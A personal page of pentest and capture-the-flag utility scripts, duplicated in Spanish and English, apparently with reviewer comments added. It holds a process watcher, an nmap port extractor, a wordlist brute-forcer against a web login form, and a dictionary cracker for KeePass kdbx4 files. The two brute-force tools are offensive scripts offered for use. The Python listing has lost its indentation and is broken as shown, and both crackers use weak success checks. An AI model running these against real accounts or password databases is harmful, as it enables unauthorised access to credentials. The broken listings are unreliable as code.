03-03-2023
Varias utilidades que he ido programando para distintos escenarios.
#!/bin/env bash
#========================================================#
# Author: Alejandro García Peláez
# Name: watchproc
# Description: Pequeño script en bash para detectar la
# ejecución de procesos "temporales" (automatizados).
#========================================================#
# help panel
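#######################################
# Print the usage panel.
# Globals:   none
# Arguments: none ($0 is read for the script name)
# Outputs:   usage text on stdout
#######################################
help() {
  # %s keeps the script name out of the format string, and the explicit
  # space separates it from the option placeholder.
  printf '[!] Usage: %s [FILTER OPTIONS]\n\nFilters:\n\n' "$0"
  printf '%s\t %s\n\n' '-u, --user' 'Filter processes according to a specific user'
  printf '%s\t %s\n\n' '-cmd, --command' 'Filter the processes by specifying a part of the command'
}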
# Ctrl+c or SIGINT trap
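#######################################
# SIGINT (Ctrl+C) handler: remove the snapshot files and leave.
# Outputs: exit notice on stdout
# Returns: never returns; exits with status 0
#######################################
trap_handler() {
  # Remove only the two snapshot files this script writes. A `*_proc` glob
  # would also delete unrelated files in the working directory, and a name
  # starting with '-' would be parsed by rm as an option.
  rm -f -- current_proc actual_proc
  echo -e "\n[>](watchproc) Exiting..."
  exit 0
}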
# Checks if the value is empty
#######################################
# Stop with the usage panel when an option was given without a value.
# Arguments: $1 - value supplied for the option
# Returns:   0 when $1 is non-empty; otherwise prints help and exits 1
#######################################
empty_value() {
  [[ -n $1 ]] && return 0
  help
  exit 1
}
# Assign the value for filtering
#######################################
# Append a filter term to the FILTERS regular expression.
# Globals:   FILTERS (read, written)
# Arguments: $1 - term to add
# Terms are joined with ".*" in the order they are given, so a later term
# must appear after an earlier one on the matched line.
#######################################
assign_value() {
  local term=$1
  if [[ -n $FILTERS ]]; then
    FILTERS="${FILTERS}.*${term}"
    return
  fi
  FILTERS=$term
}
# Obtain all processes for comparison
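#######################################
# Write a filtered snapshot of the process list to a file.
# Globals:   FILTERS (read)    - extended regex a line must match
#            EXPRESSION (read) - extended regex for lines to drop
# Arguments: $1 - file that receives the snapshot
#######################################
save_proc() {
  # Quoting matters here: an empty FILTERS must reach grep as an empty pattern
  # (match every line) instead of vanishing from the command line, and a
  # filter or file name with spaces or glob characters must stay one word.
  # `--` keeps a filter that starts with '-' from being read as an option.
  # The second grep drops every line that contains '[', which is how ps
  # prints kernel threads.
  ps -eo pid,user,cmd --sort -pid \
    | grep -E -- "$FILTERS" \
    | grep -Ev "\[" \
    | grep -Ev "$EXPRESSION" > "$1"
}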
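trap trap_handler SIGINT

# Lines produced by this script's own pipeline (the ps call and the greps)
# are dropped from every snapshot.
EXPRESSION="grep|ps -eo pid,user,cmd"
FILTERS=""

# Options come as "flag value" pairs, so walk the arguments two at a time.
ARGS=("$@")
for ((i = 0; i < $#; i = i + 2)); do
  ARG=${ARGS[i]}
  VALUE=${ARGS[i + 1]}
  # The options are just to make it easier to understand what is being done,
  # specifically is made for my machine guides.
  case "$ARG" in
    -u | --user)
      # Quoted so a value with spaces or glob characters stays one argument.
      empty_value "$VALUE"
      assign_value "$VALUE"
      ;;
    -cmd | --command)
      empty_value "$VALUE"
      assign_value "$VALUE"
      ;;
    *)
      echo "[x] Unknown arg: $ARG"
      help
      exit 1
      ;;
  esac
done

# Keep the snapshot files in a private directory. Fixed names in the current
# directory can clobber existing files, and in a shared writable directory a
# file or symlink that already carries one of those names would be written
# through by the redirection.
WORKDIR=$(mktemp -d) || {
  echo "[x] Could not create a working directory" >&2
  exit 1
}
trap 'rm -rf -- "$WORKDIR"' EXIT
cd "$WORKDIR" || exit 1

echo -e "[0](watchproc) Detecting process execution...\n"
save_proc current_proc

# Watch the processes.
# NOTE(review): the loop has no delay, so it polls as fast as ps can run and
# keeps a core busy; presumably intentional, to catch short-lived processes.
while true; do
  save_proc actual_proc
  # Compare
  RESULT=$(diff current_proc actual_proc)
  if [[ -n $RESULT ]]; then
    # Quoted: unquoted, the diff would be collapsed onto one line and any glob
    # character in a command line would be expanded against local file names.
    printf '%s\n' "$RESULT"
    save_proc current_proc
  fi
done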
#!/bin/bash
##
## Author: Alejandro García Peláez
##
## Script sencillo en bash para extraer mediante regex los puertos abiertos obtenidos por
## nmap con el formato -oG y copiarlos al "portapapeles" (más conocido como "clipboard").
##
## Por ejemplo (usando TCP port scan por defecto, -sU para UDP):
##
## nmap -p- --open -T5 -n <ip> -oG openTCPports
## ./grePorts
## [!] Open ports: <port1>,<port2>...<portN>
##
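if [ -f openTCPports ]; then
  # Take the number in front of each "/open" state field of the greppable
  # output. Collecting every digit on the line instead would also pick up
  # digits from service names or version strings and merge them into the list.
  # The pattern is quoted so the shell cannot expand it as a glob against
  # files in the current directory.
  # sort -un removes duplicates when the file holds more than one host line;
  # paste joins the ports with commas.
  ports=$(grep -oP '[0-9]+(?=/open[/|])' openTCPports | sort -un | paste -sd, -)
  echo "[!] Open ports: $ports"
  # printf with a quoted argument: no trailing newline, no word splitting.
  printf '%s' "$ports" | xclip -sel clip
else
  echo "[x] The file 'openTCPports' dont exist"
  exit 1
fi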
#!/bin/env python
# Author: 4rtic f0x
# [x] Usage => python3 login_bruteforce.py <username>
#
# Simple ataque de fuerza bruta via HTTP para un usuario conocido.
import sys, os, requests, pdb, signal, re
from pwn import *
### GLOBALS ###
# Login endpoint every request is sent to (example.com is a placeholder host).
URL="https://example.com/login.php"
# Candidate-password file; the name is relative, so it is opened from the
# current working directory.
WORDLIST="rockyou.txt"
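def signal_handler(sig, frame):
    """Handle SIGINT: print a notice and stop the script.

    Args:
        sig: signal number passed in by the interpreter (unused).
        frame: current stack frame passed in by the interpreter (unused).

    Raises:
        SystemExit: always, with exit status 1.
    """
    # The body is indented under the def; at column 0 the function does not parse.
    print('\n[!] Signal end...')
    sys.exit(1)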
# Register signal_handler so Ctrl+C ends the run with its notice.
signal.signal(signal.SIGINT, signal_handler)
# NOTE(review): this listing has lost its indentation. The nesting appears to be
# if __main__ > with > for > try, with the except paired to the try; confirm
# against the original file.
if __name__ == "__main__":
# Account name under test, taken from the first command-line argument.
user = sys.argv[1]
# Placeholder cookie values sent with every request.
cookies = {'cookies': 'cookies'}
# Number of wordlist lines read so far; shown in the progress line.
sentinel = 0
progress_bar = log.progress("")
with open(WORDLIST,"rb") as passfile:
for password in passfile:
sentinel += 1
try:
# decode() defaults to UTF-8; a line that is not valid UTF-8 raises here and
# is reported by the except branch.
password = password.decode().strip()
progress_bar.status('Bruteforce progress for %s [%s]: %s' % (user,sentinel,password))
auth_data = {
'username': user,
'password': password
}
# One POST per candidate, with no session reuse, no delay and no custom
# headers, so each request carries the library's default User-Agent. For a
# defender that is the pattern to look for in the logs: a steady run of failed
# logins for one username from one client. Rate limiting, account lockout and
# MFA are the controls that stop this loop.
resp = requests.post(URL,verify=False, data=auth_data, cookies=cookies)
# Verify to False for ssl self-signed certificate
# NOTE(review): verify=False turns off certificate validation for every
# request, so the client cannot tell the intended server from an interceptor.
# A response counts as a hit whenever the word "incorrect" is absent from the
# body, so an error page or a lockout notice would also be reported as valid.
if not re.search("incorrect",resp.text):
print("Username: %s : Password: %s" % (user,password))
exit(0)
# Every exception (network failure, decode error) is reported and the loop
# moves on to the next line; the exception object itself is not printed.
except Exception as e:
print("[x] Error on password: %s" % password)
#!/bin/bash
#================================================#
## Author: 4rtic f0x
## Name: kdbx4bf
## Description : Dado que keepass2john no soporta la version 4 de los archivos kdbx
## este script actúa por fuerza bruta usando un diccionario para romper la contraseña y acceder a las
## credenciales.
#================================================#
# Number of command-line arguments; two are expected: the database file ($1)
# and the wordlist ($2).
ARGS=$#
# NOTE(review): the usage message is printed but the script does not exit, so
# it carries on with missing arguments.
if [[ ARGS -ne 2 ]]; then
echo "[x] Usage: kdbx4bf <kdbx file> <wordlist>"
fi
# Probe for keepassxc-cli by running its help and keeping the exit status.
keepassxc-cli -h &> /dev/null
KEEPASS_INSTALLED=$?
# NOTE(review): as with the usage check, the problem is reported without
# stopping the script.
if [[ KEEPASS_INSTALLED -ne 0 ]]; then
echo "[x] There are problems with keepassxc-cli"
fi
# Index of the current candidate, for the progress line.
SENTINEL=0
# Line count of the wordlist, for the progress line.
WORDS=$(cat $2 | wc -l)
# Every iteration is one attempt to open the database, so the cost of a guess
# is the cost of the key derivation configured in the file. A long master
# password, a key file and stronger KDF settings are what make a dictionary
# run like this one impractical.
# NOTE(review): $(cat $2) is word-split and glob-expanded by the shell, so the
# loop runs over whitespace-separated words, not over lines.
for password in $(cat $2)
do
clear
echo "[!] Working ... "$SENTINEL"/"$WORDS
# The candidate is passed to keepassxc-cli on stdin; stderr is merged into
# stdout so the tool's error text can be matched.
RESULT=$(echo $password |
keepassxc-cli open $1 2>&1 |
grep -E "Error|Invalid")
# No "Error" or "Invalid" in the output is taken as a successful open.
# NOTE(review): any failure that prints other text would be read as success;
# confirm against the tool's messages.
if [[ -z $(echo $RESULT) ]]; then
echo "[!] Valid credential for "$1": "$password
exit 0
fi
SENTINEL=$((SENTINEL + 1))
done
echo "[!] Finish => No valid credentials found"
exit 0
Several utilities that I have been programming for different scenarios.
#!/bin/env bash
#========================================================#
# Author: Alejandro García Peláez
# Name: watchproc
# Description: Small script written in bash to detect the
# execution of temporary processes.
#========================================================#
# help panel
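#######################################
# Print the usage panel.
# Globals:   none
# Arguments: none ($0 is read for the script name)
# Outputs:   usage text on stdout
#######################################
help() {
  # %s keeps the script name out of the format string, and the explicit
  # space separates it from the option placeholder.
  printf '[!] Usage: %s [FILTER OPTIONS]\n\nFilters:\n\n' "$0"
  printf '%s\t %s\n\n' '-u, --user' 'Filter processes according to a specific user'
  printf '%s\t %s\n\n' '-cmd, --command' 'Filter the processes by specifying a part of the command'
}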
# Ctrl+c or SIGINT trap
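#######################################
# SIGINT (Ctrl+C) handler: remove the snapshot files and leave.
# Outputs: exit notice on stdout
# Returns: never returns; exits with status 0
#######################################
trap_handler() {
  # Remove only the two snapshot files this script writes. A `*_proc` glob
  # would also delete unrelated files in the working directory, and a name
  # starting with '-' would be parsed by rm as an option.
  rm -f -- current_proc actual_proc
  echo -e "\n[>](watchproc) Exiting..."
  exit 0
}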
# Checks if the value is empty
#######################################
# Stop with the usage panel when an option was given without a value.
# Arguments: $1 - value supplied for the option
# Returns:   0 when $1 is non-empty; otherwise prints help and exits 1
#######################################
empty_value() {
  [[ -n $1 ]] && return 0
  help
  exit 1
}
# Assign the value for filtering
#######################################
# Append a filter term to the FILTERS regular expression.
# Globals:   FILTERS (read, written)
# Arguments: $1 - term to add
# Terms are joined with ".*" in the order they are given, so a later term
# must appear after an earlier one on the matched line.
#######################################
assign_value() {
  local term=$1
  if [[ -n $FILTERS ]]; then
    FILTERS="${FILTERS}.*${term}"
    return
  fi
  FILTERS=$term
}
# Obtain all processes for comparison
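#######################################
# Write a filtered snapshot of the process list to a file.
# Globals:   FILTERS (read)    - extended regex a line must match
#            EXPRESSION (read) - extended regex for lines to drop
# Arguments: $1 - file that receives the snapshot
#######################################
save_proc() {
  # Quoting matters here: an empty FILTERS must reach grep as an empty pattern
  # (match every line) instead of vanishing from the command line, and a
  # filter or file name with spaces or glob characters must stay one word.
  # `--` keeps a filter that starts with '-' from being read as an option.
  # The second grep drops every line that contains '[', which is how ps
  # prints kernel threads.
  ps -eo pid,user,cmd --sort -pid \
    | grep -E -- "$FILTERS" \
    | grep -Ev "\[" \
    | grep -Ev "$EXPRESSION" > "$1"
}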
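trap trap_handler SIGINT

# Lines produced by this script's own pipeline (the ps call and the greps)
# are dropped from every snapshot.
EXPRESSION="grep|ps -eo pid,user,cmd"
FILTERS=""

# Options come as "flag value" pairs, so walk the arguments two at a time.
ARGS=("$@")
for ((i = 0; i < $#; i = i + 2)); do
  ARG=${ARGS[i]}
  VALUE=${ARGS[i + 1]}
  # The options are just to make it easier to understand what is being done,
  # specifically is made for my machine guides.
  case "$ARG" in
    -u | --user)
      # Quoted so a value with spaces or glob characters stays one argument.
      empty_value "$VALUE"
      assign_value "$VALUE"
      ;;
    -cmd | --command)
      empty_value "$VALUE"
      assign_value "$VALUE"
      ;;
    *)
      echo "[x] Unknown arg: $ARG"
      help
      exit 1
      ;;
  esac
done

# Keep the snapshot files in a private directory. Fixed names in the current
# directory can clobber existing files, and in a shared writable directory a
# file or symlink that already carries one of those names would be written
# through by the redirection.
WORKDIR=$(mktemp -d) || {
  echo "[x] Could not create a working directory" >&2
  exit 1
}
trap 'rm -rf -- "$WORKDIR"' EXIT
cd "$WORKDIR" || exit 1

echo -e "[0](watchproc) Detecting process execution...\n"
save_proc current_proc

# Watch the processes.
# NOTE(review): the loop has no delay, so it polls as fast as ps can run and
# keeps a core busy; presumably intentional, to catch short-lived processes.
while true; do
  save_proc actual_proc
  # Compare
  RESULT=$(diff current_proc actual_proc)
  if [[ -n $RESULT ]]; then
    # Quoted: unquoted, the diff would be collapsed onto one line and any glob
    # character in a command line would be expanded against local file names.
    printf '%s\n' "$RESULT"
    save_proc current_proc
  fi
done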
#!/bin/bash
##
## Author: Alejandro García Peláez
##
## Simple bash script that extracts the open ports from nmap's -oG output
## (and copies them to the clipboard)
##
## For example (using TCP port scan by default, -sU for UDP):
##
## nmap -p- --open -T5 -n <ip> -oG openTCPports
## ./grePorts
## [!] Open ports: <port1>,<port2>...<portN>
##
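if [ -f openTCPports ]; then
  # Take the number in front of each "/open" state field of the greppable
  # output. Collecting every digit on the line instead would also pick up
  # digits from service names or version strings and merge them into the list.
  # The pattern is quoted so the shell cannot expand it as a glob against
  # files in the current directory.
  # sort -un removes duplicates when the file holds more than one host line;
  # paste joins the ports with commas.
  ports=$(grep -oP '[0-9]+(?=/open[/|])' openTCPports | sort -un | paste -sd, -)
  echo "[!] Open ports: $ports"
  # printf with a quoted argument: no trailing newline, no word splitting.
  printf '%s' "$ports" | xclip -sel clip
else
  echo "[x] The file 'openTCPports' dont exist"
  exit 1
fi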
#!/bin/env python
# Author: 4rtic f0x
# [x] Usage => python3 login_bruteforce.py <username>
#
# Simple python script to brute-force attack a login panel from known user
import sys, os, requests, pdb, signal, re
from pwn import *
### GLOBALS ###
# Login endpoint every request is sent to (example.com is a placeholder host).
URL="https://example.com/login.php"
# Candidate-password file; the name is relative, so it is opened from the
# current working directory.
WORDLIST="rockyou.txt"
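def signal_handler(sig, frame):
    """Handle SIGINT: print a notice and stop the script.

    Args:
        sig: signal number passed in by the interpreter (unused).
        frame: current stack frame passed in by the interpreter (unused).

    Raises:
        SystemExit: always, with exit status 1.
    """
    # The body is indented under the def; at column 0 the function does not parse.
    print('\n[!] Signal end...')
    sys.exit(1)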
# Register signal_handler so Ctrl+C ends the run with its notice.
signal.signal(signal.SIGINT, signal_handler)
# NOTE(review): this listing has lost its indentation. The nesting appears to be
# if __main__ > with > for > try, with the except paired to the try; confirm
# against the original file.
if __name__ == "__main__":
# Account name under test, taken from the first command-line argument.
user = sys.argv[1]
# Placeholder cookie values sent with every request.
cookies = {'cookies': 'cookies'}
# Number of wordlist lines read so far; shown in the progress line.
sentinel = 0
progress_bar = log.progress("")
with open(WORDLIST,"rb") as passfile:
for password in passfile:
sentinel += 1
try:
# decode() defaults to UTF-8; a line that is not valid UTF-8 raises here and
# is reported by the except branch.
password = password.decode().strip()
progress_bar.status('Bruteforce progress for %s [%s]: %s' % (user,sentinel,password))
auth_data = {
'username': user,
'password': password
}
# One POST per candidate, with no session reuse, no delay and no custom
# headers, so each request carries the library's default User-Agent. For a
# defender that is the pattern to look for in the logs: a steady run of failed
# logins for one username from one client. Rate limiting, account lockout and
# MFA are the controls that stop this loop.
resp = requests.post(URL,verify=False, data=auth_data, cookies=cookies)
# Verify to False for ssl self-signed certificate
# NOTE(review): verify=False turns off certificate validation for every
# request, so the client cannot tell the intended server from an interceptor.
# A response counts as a hit whenever the word "incorrect" is absent from the
# body, so an error page or a lockout notice would also be reported as valid.
if not re.search("incorrect",resp.text):
print("Username: %s : Password: %s" % (user,password))
exit(0)
# Every exception (network failure, decode error) is reported and the loop
# moves on to the next line; the exception object itself is not printed.
except Exception as e:
print("[x] Error on password: %s" % password)
#!/bin/bash
#================================================#
## Author: 4rtic f0x
## Name: kdbx4bf
## Description : Since keepass2john does not support version 4 of the kdbx
## files this script acts by brute force using a dictionary to break the password and gain access to the
## credentials.
#================================================#
# Number of command-line arguments; two are expected: the database file ($1)
# and the wordlist ($2).
ARGS=$#
# NOTE(review): the usage message is printed but the script does not exit, so
# it carries on with missing arguments.
if [[ ARGS -ne 2 ]]; then
echo "[x] Usage: kdbx4bf <kdbx file> <wordlist>"
fi
# Probe for keepassxc-cli by running its help and keeping the exit status.
keepassxc-cli -h &> /dev/null
KEEPASS_INSTALLED=$?
# NOTE(review): as with the usage check, the problem is reported without
# stopping the script.
if [[ KEEPASS_INSTALLED -ne 0 ]]; then
echo "[x] There are problems with keepassxc-cli"
fi
# Index of the current candidate, for the progress line.
SENTINEL=0
# Line count of the wordlist, for the progress line.
WORDS=$(cat $2 | wc -l)
# Every iteration is one attempt to open the database, so the cost of a guess
# is the cost of the key derivation configured in the file. A long master
# password, a key file and stronger KDF settings are what make a dictionary
# run like this one impractical.
# NOTE(review): $(cat $2) is word-split and glob-expanded by the shell, so the
# loop runs over whitespace-separated words, not over lines.
for password in $(cat $2)
do
clear
echo "[!] Working ... "$SENTINEL"/"$WORDS
# The candidate is passed to keepassxc-cli on stdin; stderr is merged into
# stdout so the tool's error text can be matched.
RESULT=$(echo $password |
keepassxc-cli open $1 2>&1 |
grep -E "Error|Invalid")
# No "Error" or "Invalid" in the output is taken as a successful open.
# NOTE(review): any failure that prints other text would be read as success;
# confirm against the tool's messages.
if [[ -z $(echo $RESULT) ]]; then
echo "[!] Valid credential for "$1": "$password
exit 0
fi
SENTINEL=$((SENTINEL + 1))
done
echo "[!] Finish => No valid credentials found"
exit 0